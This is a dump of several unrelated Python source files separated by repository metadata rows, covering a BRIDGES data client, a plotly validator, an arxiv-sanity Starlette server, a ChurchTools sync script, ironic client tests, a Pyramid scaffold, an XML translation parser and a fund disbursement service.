raise RuntimeError("Malformed JSON: Unable to Parse. Does this assignment exist?")
color_grid = ColorGrid(dim_x, dim_y)
if encoding == "RAW":
if len(decoded) != dim_x * dim_y * 4:
raise RuntimeError("Malformed ColorGrid JSON: nodes is not the size we expect for RAW encoding")
base = 0
for x in range(0, dim_x):
for y in range(0, dim_y):
color = Color(decoded[base],
decoded[base + 1],
decoded[base + 2],
(decoded[base + 3]/255.0)
)
color_grid.set(x, y, color)
base = base + 4
elif encoding == "RLE":
if len(decoded) % 5:
raise RuntimeError("Malformed ColorGrid JSON: RLE nodes are not a multiple of 5")
current_in_decoded = 0
current_in_cg = 0
while current_in_decoded != len(decoded):
repeat = decoded[current_in_decoded]
color = Color(decoded[current_in_decoded + 1],
decoded[current_in_decoded + 2],
decoded[current_in_decoded + 3],
(decoded[current_in_decoded + 4] / 255.0)
)
current_in_decoded = current_in_decoded + 5
while repeat >= 0:
pos_x = int(current_in_cg / dim_y)
pos_y = int(current_in_cg % dim_y)
if pos_x >= dim_x or pos_y >= dim_y:
raise RuntimeError("Malformed ColorGrid JSON: Too much data in nodes")
color_grid.set(pos_x, pos_y, color)
current_in_cg = current_in_cg + 1
repeat = repeat - 1
return color_grid
def get_assignment(server: str, user: str, assignment: int, subassignment: int = 0) -> str:
"""
This function obtains the JSON representation of a particular assignment as a string
:param str server: internal server url of bridges object
:param str user: the name of the user who uploaded the assignment
:param int assignment: the ID of the assignment to get
:param int subassignment: the ID of the subassignment to get (default 0)
:return str that is the JSON representation of the subassignment as stored by the bridges server
"""
subassignment_fixed = "0{}".format(subassignment) if subassignment < 10 else subassignment
url = "{}/assignmentJSON/{}.{}/{}".format(server, assignment, subassignment_fixed, user)
params = "Accept: application/json"
request = requests.get(url, params)
if request.ok:
return request.content
else:
raise request.raise_for_status()
def osm_server_request(url):
request = requests.get(url)
if not request.ok:
if request.status_code == 404:
request = requests.get(url)
if not request.ok:
raise request.raise_for_status()
raise RuntimeError("Location: {} is not supported,\n valid names: {}".format(location, valid_names))
raise request.raise_for_status()
server_data = request.content
return server_data
def get_osm_data(*args) -> OsmData:
"""Takes a location name as a string and returns an OsmData object
:param
:return: OsmData:
"""
import os
if (len(args) == 2):
location = args[0]
level = args[1]
url = "http://cci-bridges-osm.uncc.edu/loc?location=" + location + "&level=" + level
hash_url = "http://cci-bridges-osm.uncc.edu/hash?location=" + location + "&level=" + level
elif (len(args) == 5):
minLat = str(args[0])
minLon = str(args[1])
maxLat = str(args[2])
maxLon = str(args[3])
level = args[4]
url = "http://cci-bridges-osm.uncc.edu/coords?minLon=" + minLon + "&minLat=" + minLat + "&maxLon=" + maxLon + "&maxLat=" + maxLat + "&level=" + level
hash_url = "http://cci-bridges-osm.uncc.edu/hash?minLon=" + minLon + "&minLat=" + minLat + "&maxLon=" + maxLon + "&maxLat=" + maxLat + "&level=" + level
else:
raise RuntimeError("Invalid Map Request Inputs")
lru = lru_cache.lru_cache(30)
try:
from types import SimpleNamespace as Namespace
except ImportError:
from argparse import Namespace
data = None
not_skip = True
hash = osm_server_request(hash_url).decode('utf-8')
if (hash != "false" and lru.inCache(hash)):
not_skip = False
data = lru.get(hash)
if not_skip:
content = osm_server_request(url)
try:
data = json.loads(content.decode('utf-8'), object_hook=lambda d: Namespace(**d))
except:
print("Error: Corrupted JSON download...\nAttempting redownload...")
content = osm_server_request(url)
try:
data = json.loads(content.decode('utf-8'), object_hook=lambda d: Namespace(**d))
except Exception as e:
print(f"Error: Redownload attempt failed\n{e}")
sys.exit(0)
hash = osm_server_request(hash_url).decode('utf-8')
lru.put(hash, data)
try:
if data.nodes is None or data.edges is None or data.meta is None:
raise RuntimeError("Malformed OSM JSON")
vertex_map = {}
vertices = []
for i, node in enumerate(data.nodes):
vertex_map[node[0]] = i
vertices.append(OsmVertex(node[1], node[2]))
edges = []
for edge in data.edges:
id_from = edge[0]
id_to = edge[1]
dist = edge[2]
edges.append(OsmEdge(vertex_map[id_from], vertex_map[id_to], dist))
ret_osm = OsmData()
ret_osm.edges = edges
ret_osm.vertices = vertices
ret_osm.name = data.meta.name
return ret_osm
except AttributeError:
raise RuntimeError("Malformed JSON: Unable to parse")
def elevation_server(url):
request = requests.get(url)
if not request.ok:
if request.status_code == 404:
request = requests.get(url)
if not request.ok:
raise request.raise_for_status()
raise RuntimeError("Issue with request")
raise request.raise_for_status()
server_data = request.content
return server_data
def get_elevation_data(*args):
"""This function returns elevation data for the requested
location and resolution. Note that the data returned may be for a
slightly different location and resolution than requested.
:param args[0]: a bounding box, aka an array [minLat, minLon, maxLat, maxLon]
:param args[1]: spatial resolution, aka the distance between two samples (in degrees)
:return EleData for the bounding box and resolution requested (approximately)
"""
base_url = "http://cci-bridges-elevation-t.dyn.uncc.edu/elevation"
hash_url = "http://cci-bridges-elevation-t.dyn.uncc.edu/hash"
coords = args[0]
minLat = coords[0]
minLon = coords[1]
maxLat = coords[2]
maxLon = coords[3]
res = .0166
if len(args) == 2:
res = args[1]
url = base_url + f"?minLat={minLat}&minLon={minLon}&maxLat={maxLat}&maxLon={maxLon}&resX={res}&resY={res}"
hash_url = hash_url + f"?minLat={minLat}&minLon={minLon}&maxLat={maxLat}&maxLon={maxLon}&resX={res}&resY={res}"
#loads cache
lru = lru_cache.lru_cache(30)
data = None
not_skip = True
hash = False
hash = elevation_server(hash_url).decode('utf-8')
if (hash != "false" and lru.inCache(hash)):
not_skip = False
data = lru.get(hash)
if not_skip:
data = elevation_server(url).decode("utf-8")
hash = elevation_server(hash_url).decode('utf-8')
lru.put(hash, data)
#parse and build object
ret_ele = EleData()
file_array = data.splitlines()
ret_ele.cols = int(file_array[0].split(" ")[-1])
ret_ele.rows = int(file_array[1].split(" ")[-1])
ret_ele._xll = float(file_array[2].split(" ")[-1])
ret_ele._yll = float(file_array[3].split(" ")[-1])
ret_ele.cellsize = float(file_array[4].split(" ")[-1])
maxVal = -9999999999
x = 5
while (x < len(file_array)):
arr = file_array[x].replace("\n", "").split(" ")
arr.pop(0)
parsedline = []
for y in arr:
parsedline.append(int(y))
if(int(y) > maxVal):
maxVal = int(y)
ret_ele.data.append(parsedline)
x += 1
ret_ele.maxVal = maxVal
return ret_ele
def _get_wiki_actor_movie_direct(year_begin, year_end, array_out):
sparql = SPARQLWrapper("https://query.wikidata.org/sparql")
sparql.setQuery("""
SELECT ?movie ?movieLabel ?actor ?actorLabel WHERE \
{\
?movie wdt:P31 wd:Q11424.\
?movie wdt:P161 ?actor.\
?movie wdt:P364 wd:Q1860.\
?movie wdt:P577 ?date.\
FILTER(YEAR(?date) >= """ + str(year_begin) + """ && YEAR(?date) <= """ + str(year_end) + """).\
SERVICE wikibase:label { bd:serviceParam wikibase:language \"en\". } \
}
""")
sparql.addCustomHttpHeader("User-Agent", 'bridges-python')
sparql.setReturnFormat(JSON)
results = sparql.query().convert()
for result in results["results"]["bindings"]:
mak = movie_actor_wiki_data.MovieActorWikiData()
actor_uri = str(result['actor']['value'])
movie_uri = str(result['movie']['value'])
actor_uri = actor_uri.replace("http://www.wikidata.org/entity/","",1)
movie_uri = movie_uri.replace("http://www.wikidata.org/entity/","",1)
mak.actor_uri = actor_uri
mak.movie_uri = movie_uri
mak.movie_name = str(result['movieLabel']['value'])
mak.actor_name = str(result['actorLabel']['value'])
array_out.append(mak)
# print(result['movie']['value'])
def get_wiki_data_actor_movie(year_begin, year_end):
ret = []
for y in range(year_begin, year_end):
_get_wiki_actor_movie_direct(y, y, ret)
return ret
class DataSource:
pass
| 30.183727 | 160 | 0.608739 | 3,008 | 23,000 | 4.542886 | 0.148604 | 0.008708 | 0.015368 | 0.015807 | 0.440322 | 0.374094 | 0.305159 | 0.281595 | 0.259129 | 0.214709 | 0 | 0.010045 | 0.268522 | 23,000 | 761 | 161 | 30.22339 | 0.802187 | 0.172565 | 0 | 0.322785 | 0 | 0.004219 | 0.170027 | 0.011757 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037975 | false | 0.00211 | 0.054852 | 0 | 0.130802 | 0.004219 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
140b9b0b97e871cc880c6a62e7358c9920469b5f | 494 | py | Python | plotly/validators/choropleth/_locationmode.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 2 | 2020-03-24T11:41:14.000Z | 2021-01-14T07:59:43.000Z | plotly/validators/choropleth/_locationmode.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | null | null | null | plotly/validators/choropleth/_locationmode.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 4 | 2019-06-03T14:49:12.000Z | 2022-01-06T01:05:12.000Z | import _plotly_utils.basevalidators
class LocationmodeValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name='locationmode', parent_name='choropleth', **kwargs
):
super(LocationmodeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
role='info',
values=['ISO-3', 'USA-states', 'country names'],
**kwargs
)
| 29.058824 | 78 | 0.62753 | 45 | 494 | 6.466667 | 0.622222 | 0.103093 | 0.171821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002747 | 0.263158 | 494 | 16 | 79 | 30.875 | 0.796703 | 0 | 0 | 0 | 0 | 0 | 0.117409 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
140d58b062f440d69f4d9438bb9af96e8e79b82f | 5,453 | py | Python | server.py | rosinality/arxiv-sanity | 8905f2ed8dcd873b216624705f26cdd4693bf499 | [
"MIT"
] | 3 | 2019-11-14T12:43:58.000Z | 2021-01-10T15:29:21.000Z | server.py | rosinality/arxiv-sanity | 8905f2ed8dcd873b216624705f26cdd4693bf499 | [
"MIT"
] | null | null | null | server.py | rosinality/arxiv-sanity | 8905f2ed8dcd873b216624705f26cdd4693bf499 | [
"MIT"
] | 1 | 2020-06-16T16:58:52.000Z | 2020-06-16T16:58:52.000Z | import re
import logging
from math import ceil
from datetime import datetime
from starlette.applications import Starlette
from starlette.responses import PlainTextResponse
from starlette.templating import Jinja2Templates
from starlette.staticfiles import StaticFiles
import uvicorn
from gensim.summarization.summarizer import summarize
from model import Papers, database
templates = Jinja2Templates(directory='templates')
app = Starlette(debug=False)
app.mount('/static', StaticFiles(directory='static'), name='static')
def unix_to_date(unixtime):
return datetime.utcfromtimestamp(unixtime).strftime('%Y-%m-%d')
@app.route('/mark/{id}/{state}')
async def mark(request):
state_map = {'none': 0, 'read': 1, 'later': 2}
state = request.path_params['state']
id = request.path_params['id']
query = Papers.update(state=state_map[state]).where(Papers.id == id)
query.execute()
return PlainTextResponse(state)
def make_page_list(page, min_page, max_page, expected_length):
pages = []
left_margin = max(min_page, page - (expected_length - 1) // 2)
right_margin = min(max_page, page + (expected_length - 1) // 2) + 1
for index, i in enumerate(range(left_margin, right_margin)):
pages.append(i)
len_page = len(pages)
if len_page < expected_length:
for i in range(
right_margin, min(max_page, right_margin + expected_length - len(pages))
):
pages.append(i)
right_page = []
if len(pages) > 0:
for i in range(
max(min_page, left_margin - expected_length + len(pages)), pages[0]
):
right_page.append(i)
pages = right_page + pages
if len(pages) > 0 and pages[0] > 1:
if pages[0] > 2:
pages = ['...'] + pages
pages = [1] + pages
if len(pages) < 1:
pages = [1] + pages
if len(pages) > 0:
if pages[-1] < max_page:
if pages[-1] < max_page - 1:
pages = pages + ['...']
pages = pages + [max_page]
return pages
def get_page(request, mark='all', page=1):
paper_per_page = 10
state_map_rev = {'none': 0, 'read': 1, 'later': 2}
state_map = {0: 'none', 1: 'read', 2: 'later'}
keyword = request.query_params.get('search')
try:
keyword = request.query_params['search']
keywords = keyword.split()
except KeyError:
keywords = None
# papers = Papers.select(Papers, fn.COUNT(SQL('*')).over().alias('n_paper'))
papers = Papers.select()
if mark != 'all':
papers = papers.where(Papers.state == state_map_rev[mark])
if keywords is not None:
for keyword in keywords:
papers = papers.where(Papers.title ** f'%{keyword}%')
'''if len(papers) > 0:
n_paper = papers[0].n_paper
else:
n_paper = 0'''
n_paper = papers.count()
max_page = ceil(n_paper / paper_per_page)
papers = papers.order_by(Papers.updated.desc()).paginate(page, paper_per_page)
records = []
for paper in papers.iterator():
summary = paper.summary.replace('\n', ' ')
try:
summary_short = summarize(summary)
except (ValueError, TypeError) as _:
summary_short = summary
title = paper.title
if keywords is not None:
for keyword in keywords:
title = re.sub(
f'({keyword})',
r'<span class="found">\1</span>',
title,
flags=re.IGNORECASE,
)
records.append(
{
'id': paper.id,
'title': title,
'category': paper.category,
'summary': paper.summary,
'summary_short': summary_short,
'authors': paper.authors,
'version': paper.version,
'published': unix_to_date(paper.published),
'updated': unix_to_date(paper.updated),
'state': state_map[paper.state],
'new': paper.new,
}
)
pages = make_page_list(page, 1, max_page, expected_length=5)
del papers
search_query = ''
if keywords is not None:
search_query = '?search=' + request.query_params['search']
# database.close_all()
return templates.TemplateResponse(
'index.html',
{
'request': request,
'n_paper': n_paper,
'searched': True if keyword is not None else False,
'search_query': search_query,
'papers': records,
'total_page': max_page,
'current_page': page,
'mark': mark,
'pagination': pages,
'prev_page': max(1, page - 1),
'next_page': max(1, min(max_page, page + 1)),
},
)
@app.route('/')
@app.route('/{mark}')
@app.route('/{page:int}')
@app.route('/{mark}/{page:int}')
async def index(request):
mark = request.path_params.get('mark', 'all')
page = request.path_params.get('page', 1)
response = get_page(request, mark, page)
return response
@app.on_event('shutdown')
def shutdown():
database.close()
if __name__ == '__main__':
logger = logging.getLogger('gensim')
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.ERROR)
uvicorn.run(app, host='0.0.0.0', port=8000)
| 26.342995 | 84 | 0.575096 | 642 | 5,453 | 4.733645 | 0.247664 | 0.023034 | 0.029615 | 0.010859 | 0.125041 | 0.090819 | 0.039487 | 0.025666 | 0.025666 | 0 | 0 | 0.013468 | 0.291949 | 5,453 | 206 | 85 | 26.470874 | 0.773634 | 0.017422 | 0 | 0.118881 | 0 | 0 | 0.084743 | 0.00437 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027972 | false | 0 | 0.076923 | 0.006993 | 0.13986 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
140f20997a32115cc05697358fa597c854b552ef | 1,061 | py | Python | syncAlleMitarbeiter.py | wulmer/churchtools-automation | 8fa7e3d96c42a6a03ffc37a269ba3b95a856d83e | [
"MIT"
] | null | null | null | syncAlleMitarbeiter.py | wulmer/churchtools-automation | 8fa7e3d96c42a6a03ffc37a269ba3b95a856d83e | [
"MIT"
] | null | null | null | syncAlleMitarbeiter.py | wulmer/churchtools-automation | 8fa7e3d96c42a6a03ffc37a269ba3b95a856d83e | [
"MIT"
] | null | null | null | import os
from churchtools import ChurchToolsApi
if __name__ == "__main__":
ct = ChurchToolsApi(os.environ["API_BASE_URL"], os.environ["ADMIN_TOKEN"])
all_members_group_id = list(ct.get_groups(query="Auto-Gruppe: Alle Mitarbeiter"))[
0
]["id"]
member_status_ids = [s["id"] for s in ct.get_statuses() if s["isMember"]]
member_persons = ct.get_persons(status_ids=member_status_ids)
member_person_ids = {p["id"] for p in member_persons}
existing_group_members = ct.get_group_members(group_id=all_members_group_id)
existing_group_member_ids = {p["personId"] for p in existing_group_members}
to_add = member_person_ids - existing_group_member_ids
to_remove = existing_group_member_ids - member_person_ids
if not to_add and not to_remove:
print("Nothing to do today :-)")
for p in to_add:
print(f"Adding #{p}")
ct.add_to_group(who=p, to=all_members_group_id)
for p in to_remove:
print(f"Removing #{p}")
ct.remove_from_group(who=p, from_=all_members_group_id)
| 34.225806 | 86 | 0.708765 | 165 | 1,061 | 4.157576 | 0.327273 | 0.087464 | 0.102041 | 0.099125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001155 | 0.183789 | 1,061 | 30 | 87 | 35.366667 | 0.790993 | 0 | 0 | 0 | 0 | 0 | 0.121583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0.136364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
140fe5f12606142c8580449bd83609ef34673f2a | 3,308 | py | Python | ironicclient/tests/functional/osc/v1/test_baremetal_chassis_basic.py | sapcc/python-ironicclient | 8dcbf5b6d0bc2c2dc3881dbc557e2e403e2fe2b4 | [
"Apache-2.0"
] | 41 | 2015-01-29T20:10:48.000Z | 2022-01-26T10:04:28.000Z | ironicclient/tests/functional/osc/v1/test_baremetal_chassis_basic.py | sapcc/python-ironicclient | 8dcbf5b6d0bc2c2dc3881dbc557e2e403e2fe2b4 | [
"Apache-2.0"
] | null | null | null | ironicclient/tests/functional/osc/v1/test_baremetal_chassis_basic.py | sapcc/python-ironicclient | 8dcbf5b6d0bc2c2dc3881dbc557e2e403e2fe2b4 | [
"Apache-2.0"
] | 46 | 2015-01-19T17:46:52.000Z | 2021-12-19T01:22:47.000Z | # Copyright (c) 2016 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from ironicclient.tests.functional.osc.v1 import base
class BaremetalChassisTests(base.TestCase):
"""Functional tests for baremetal chassis commands."""
def setUp(self):
super(BaremetalChassisTests, self).setUp()
self.chassis = self.chassis_create()
def test_list(self):
"""Check baremetal chassis list command.
Test steps:
1) Create baremetal chassis in setUp.
2) List baremetal chassis.
3) Check chassis description and UUID in chassis list.
"""
chassis_list = self.chassis_list()
self.assertIn(self.chassis['uuid'],
[x['UUID'] for x in chassis_list])
self.assertIn(self.chassis['description'],
[x['Description'] for x in chassis_list])
def test_show(self):
"""Check baremetal chassis show command.
Test steps:
1) Create baremetal chassis in setUp.
2) Show baremetal chassis.
3) Check chassis in chassis show.
"""
chassis = self.chassis_show(self.chassis['uuid'])
self.assertEqual(self.chassis['uuid'], chassis['uuid'])
self.assertEqual(self.chassis['description'], chassis['description'])
def test_delete(self):
"""Check baremetal chassis delete command.
Test steps:
1) Create baremetal chassis in setUp.
2) Delete baremetal chassis by UUID.
3) Check that chassis deleted successfully.
"""
output = self.chassis_delete(self.chassis['uuid'])
self.assertIn('Deleted chassis {0}'.format(self.chassis['uuid']),
output)
self.assertNotIn(self.chassis['uuid'], self.chassis_list(['UUID']))
def test_set_unset_extra(self):
"""Check baremetal chassis set and unset commands.
Test steps:
1) Create baremetal chassis in setUp.
2) Set extra data for chassis.
3) Check that baremetal chassis extra data was set.
4) Unset extra data for chassis.
5) Check that baremetal chassis extra data was unset.
"""
extra_key = 'ext'
extra_value = 'testdata'
self.openstack('baremetal chassis set --extra {0}={1} {2}'
.format(extra_key, extra_value, self.chassis['uuid']))
show_prop = self.chassis_show(self.chassis['uuid'], ['extra'])
self.assertEqual(extra_value, show_prop['extra'][extra_key])
self.openstack('baremetal chassis unset --extra {0} {1}'
.format(extra_key, self.chassis['uuid']))
show_prop = self.chassis_show(self.chassis['uuid'], ['extra'])
self.assertNotIn(extra_key, show_prop['extra'])
| 38.022989 | 78 | 0.635429 | 405 | 3,308 | 5.120988 | 0.28642 | 0.106075 | 0.072324 | 0.048216 | 0.299421 | 0.260366 | 0.182739 | 0.147059 | 0.147059 | 0.127772 | 0 | 0.011837 | 0.259371 | 3,308 | 86 | 79 | 38.465116 | 0.834694 | 0.422612 | 0 | 0.064516 | 0 | 0 | 0.13357 | 0 | 0 | 0 | 0 | 0 | 0.258065 | 1 | 0.16129 | false | 0 | 0.032258 | 0 | 0.225806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
14104a886f5961b0db75535cef7241d695e8b7c3 | 1,082 | py | Python | ramses/scaffolds/__init__.py | timgates42/ramses | ea2e1e896325b7256cdf5902309e05fd98e0c14c | [
"Apache-2.0"
] | 178 | 2016-01-29T10:59:56.000Z | 2021-09-17T18:28:24.000Z | ramses/scaffolds/__init__.py | timgates42/ramses | ea2e1e896325b7256cdf5902309e05fd98e0c14c | [
"Apache-2.0"
] | 35 | 2015-03-31T19:52:23.000Z | 2016-01-11T22:44:30.000Z | ramses/scaffolds/__init__.py | timgates42/ramses | ea2e1e896325b7256cdf5902309e05fd98e0c14c | [
"Apache-2.0"
] | 24 | 2016-02-12T02:38:28.000Z | 2020-06-20T23:35:38.000Z | import os
import subprocess
from six import moves
from pyramid.scaffolds import PyramidTemplate
class RamsesStarterTemplate(PyramidTemplate):
_template_dir = 'ramses_starter'
summary = 'Ramses starter'
def pre(self, command, output_dir, vars):
dbengine_choices = {'1': 'sqla', '2': 'mongodb'}
vars['engine'] = dbengine_choices[moves.input("""
Which database backend would you like to use:
(1) for SQLAlchemy/PostgreSQL, or
(2) for MongoEngine/MongoDB?
[default is '1']: """) or '1']
if vars['package'] == 'site':
raise ValueError("""
"Site" is a reserved keyword in Python.
Please use a different project name. """)
def post(self, command, output_dir, vars):
os.chdir(str(output_dir))
subprocess.call('pip install -r requirements.txt', shell=True)
subprocess.call('pip install nefertari-{}'.format(vars['engine']),
shell=True)
msg = """Goodbye boilerplate! Welcome to Ramses."""
self.out(msg)
| 31.823529 | 74 | 0.61183 | 123 | 1,082 | 5.317073 | 0.626016 | 0.041284 | 0.051988 | 0.061162 | 0.073395 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007557 | 0.266174 | 1,082 | 33 | 75 | 32.787879 | 0.816121 | 0 | 0 | 0 | 0 | 0 | 0.399261 | 0.020333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.16 | 0 | 0.36 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1413cca6261680634828c3e223b5596d39503334 | 2,220 | py | Python | Translations/parse.py | Bluefissure/RainbowMage.ActLocalizer | a63cca327eb4433382039fe338037062af962903 | [
"MIT"
] | 19 | 2019-06-18T16:05:27.000Z | 2021-12-09T08:48:18.000Z | Translations/parse.py | Bluefissure/RainbowMage.ActLocalizer | a63cca327eb4433382039fe338037062af962903 | [
"MIT"
] | null | null | null | Translations/parse.py | Bluefissure/RainbowMage.ActLocalizer | a63cca327eb4433382039fe338037062af962903 | [
"MIT"
] | 1 | 2020-08-24T15:35:56.000Z | 2020-08-24T15:35:56.000Z | from xml.dom.minidom import parse
import json, re
import xml.dom.minidom
import codecs
from collections import defaultdict
def readfrom_xml(xml_file, languge, textdict=None):
if not textdict:
textdict = defaultdict(dict)
DOMTree = xml.dom.minidom.parse(xml_file)
collection = DOMTree.documentElement
if collection.hasAttribute("Form"):
print("Element Type:{}".format(collection.getAttribute("Form")))
texts = collection.getElementsByTagName("Control")
for text in texts:
unique_key = "{}:{}".format(text.getAttribute("ControlPath"), text.getAttribute("UniqueName"))
if text.hasAttribute("Text") and text.hasAttribute("UniqueName"):
textdict[unique_key].update({
languge: text.getAttribute("Text"),
})
elif collection.getElementsByTagName("TreeViewTranslationEntry"):
entries = collection.getElementsByTagName("TreeViewTranslationEntry")
for entry in entries:
unique_key = "{}:{}".format("TreeViewTranslationEntry", entry.getAttribute("Original"))
if entry.hasAttribute("Original"):
textdict[unique_key].update({
languge: entry.firstChild.data,
})
return textdict
def parse_file(filename):
textdict_en = readfrom_xml("en-US/{}".format(filename), "en")
textdict_cn = readfrom_xml("zh-CN/{}".format(filename), "cn", textdict_en)
output_set = set()
with codecs.open(filename.replace(".xml",".txt"), "w", "utf8") as f:
for (_, value) in textdict_cn.items():
if "cn" in value and "en" in value:
en_str = value["en"].replace("\r","").replace("\n","\\n").strip()
cn_str = value["cn"].replace("\r","").replace("\n","\\n").strip()
if not en_str or not cn_str or en_str in output_set or not re.search(r"[\u4e00-\u9fa5]", cn_str):
continue
f.write("{}|{}\n".format(en_str, cn_str))
output_set.add(en_str)
if __name__=="__main__":
for file in ["FormActMain.xml", "ConfigTreeView.xml"]:
parse_file(file)
print("Parsed {}".format(file)) | 46.25 | 113 | 0.609009 | 246 | 2,220 | 5.349594 | 0.337398 | 0.018997 | 0.029635 | 0.028875 | 0.079027 | 0.033435 | 0 | 0 | 0 | 0 | 0 | 0.003571 | 0.243243 | 2,220 | 48 | 114 | 46.25 | 0.779762 | 0 | 0 | 0.088889 | 0 | 0 | 0.132373 | 0.032418 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.111111 | 0 | 0.177778 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1414d6a7f39b6d6d2fa543619d6402804985df1f | 3,359 | py | Python | sme_financing/main/service/fund_disbursement_service.py | BuildForSDG/team-214-backend | f1aff9c27d7b7588b4bbb2bc68956b35051d4506 | [
"MIT"
] | 1 | 2020-05-20T16:32:33.000Z | 2020-05-20T16:32:33.000Z | sme_financing/main/service/fund_disbursement_service.py | BuildForSDG/team-214-backend | f1aff9c27d7b7588b4bbb2bc68956b35051d4506 | [
"MIT"
] | 23 | 2020-05-19T07:12:53.000Z | 2020-06-21T03:57:54.000Z | sme_financing/main/service/fund_disbursement_service.py | BuildForSDG/team-214-backend | f1aff9c27d7b7588b4bbb2bc68956b35051d4506 | [
"MIT"
] | 1 | 2020-05-18T14:18:12.000Z | 2020-05-18T14:18:12.000Z | from datetime import datetime
from sqlalchemy.exc import SQLAlchemyError
from sme_financing.main import db
from ..models.fund_disbursement import FundDisbursement
from ..service.funding_project_service import get_funding_project_by_id
def update():
db.session.commit()
def commit_changes(data):
db.session.add(data)
update()
def save_disbursement(data):
funding_project = get_funding_project_by_id(id=data["funding_project_id"])
if funding_project:
new_disburse = FundDisbursement(
description=data["description"],
status=data["status"],
disbursement_date=datetime.strptime(
data["disbursement_date"], "%Y-%m-%d"
).date(),
bank_account_details_from=data["bank_account_details_from"],
bank_account_details_to=data["bank_account_details_to"],
cheque_details=data["cheque_details"],
)
new_disburse.funding_project_id = funding_project
try:
commit_changes(new_disburse)
response_object = {
"status": "success",
"message": "Funding disbursement successfully added!",
}
return response_object, 201
except SQLAlchemyError as error:
response_object = {
"status": "failure",
"message": str(error),
}
return response_object, 500
else:
response_object = {
"status": "failure",
"message": " Invalid funding project id!",
}
return response_object, 500
def update_fund_disbursement(data, disbursement_data):
if data.get("description"):
disbursement_data.description = data["description"]
if data.get("status"):
disbursement_data.status = data["status"]
if data.get("bank_account_details_from"):
disbursement_data.bank_account_details_from = data["bank_account_details_from"]
if data.get("bank_account_details_to"):
disbursement_data.bank_account_details_to = data["bank_account_details_to"]
funding_project = get_funding_project_by_id(id=data["funding_project_id"])
if not funding_project:
response_object = {"status": "failure", "message": "Update was not successful"}
return response_object, 404
else:
try:
update()
response_object = {"status": "success", "message": "Successfully updated."}
return response_object, 201
except SQLAlchemyError as err:
db.session.rollback()
response_object = {"status": "error", "message": str(err)}
return response_object, 400
def delete_disbursement(fund_disbursement):
try:
db.session.delete(fund_disbursement)
update()
response_object = {
"status": "success",
"message": "Funding disbursement successfully deleted.",
}
return response_object, 204
except SQLAlchemyError as e:
db.session.rollback()
response_object = {"status": "error", "message": str(e)}
return response_object, 500
def get_fund_disbursement_by_id(fund_disbursement_id):
return FundDisbursement.query.filter_by(id=fund_disbursement_id).first()
def get_all_fund_disbursements():
return FundDisbursement.query.all()
